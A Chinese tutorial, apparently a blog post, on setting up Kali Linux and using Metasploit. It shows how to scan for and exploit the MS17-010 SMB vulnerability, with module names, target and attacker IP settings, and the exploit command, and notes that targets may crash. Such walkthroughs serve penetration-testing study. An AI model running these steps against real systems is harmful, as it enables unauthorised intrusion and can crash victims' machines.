Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,适合于需要核实漏洞的安全专家,同时也适合于强大进攻能力的渗透测试专家。
VMware里的kali虚拟机
配置IP地址
在里面只需要敲红框里的内容,配置网卡、IP地址、掩码和网关
ifup eth0开启网卡
centos用yum安装,kali不一样,是apt-get install 软件名
但在安装前要更新apt的源,vim /etc/apt/sources.list,如下图:(这些在网上找文章更新源,比如阿里云)
msfconsole,简称msf
是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,是一款非常好的漏洞框架,有些高危漏洞没扫出来,在这个框架里基本能找到
输入msfconsole回车,运行metasploit,如下图:
这一部分是漏洞库
一开始上来可能没有这么多,上边更新源以后,在这下面敲msfupdate,即可对库进行更新
输入以下这个命令,可以查看ms17-010的payload(有效载荷),有辅助的,也有直接利用的,还有一个扫描的
红框所圈即为扫描的,search用来看ms17-010这个漏洞的模块
下图0-1为扫描模块,2-5为漏洞模块,0-2模块可以扫描靶机是否可以被漏洞利用,图片来源:https://mp.weixin.qq.com/s?src=11×tamp=1586168774&ver=2262&signature=R-2daqGXDsWc3vxEPpw0132D4vs4IpSoBbAL7-c6TfrDN0e7AGU2nSr5jmZu9pIlmN7pIrZAYGCk-chXENfm32DdWhZ5PXGi43XBDQQgUBPE44X5a*UpF9CK4b5S*UNP&new=1
使用的话输入use auxiliary/scanner/smb/smb_ms17_010,想知道怎么用,show options
再输入info可以查看说明
扫描网段的命令 :set rhosts 网址或网段, exploit用run也可以正常会扫描整个网段,有问题会显示绿颜色
这就是有漏洞显示绿色
现在使用另一个模块
设置靶机ip
set rhosts 192.168.0.101
设置攻击ip
set lhost 192.168.0.110
开启漏洞攻击
exploit
攻击成功则会向下图这样显示,要是中间断开没有攻击成功的话,被攻击的电脑主机可能会蓝屏
下图是一个集中的漏洞库,更新得很快,如果有更新可以加载到kali里(我并没有找到操作的博客。。。)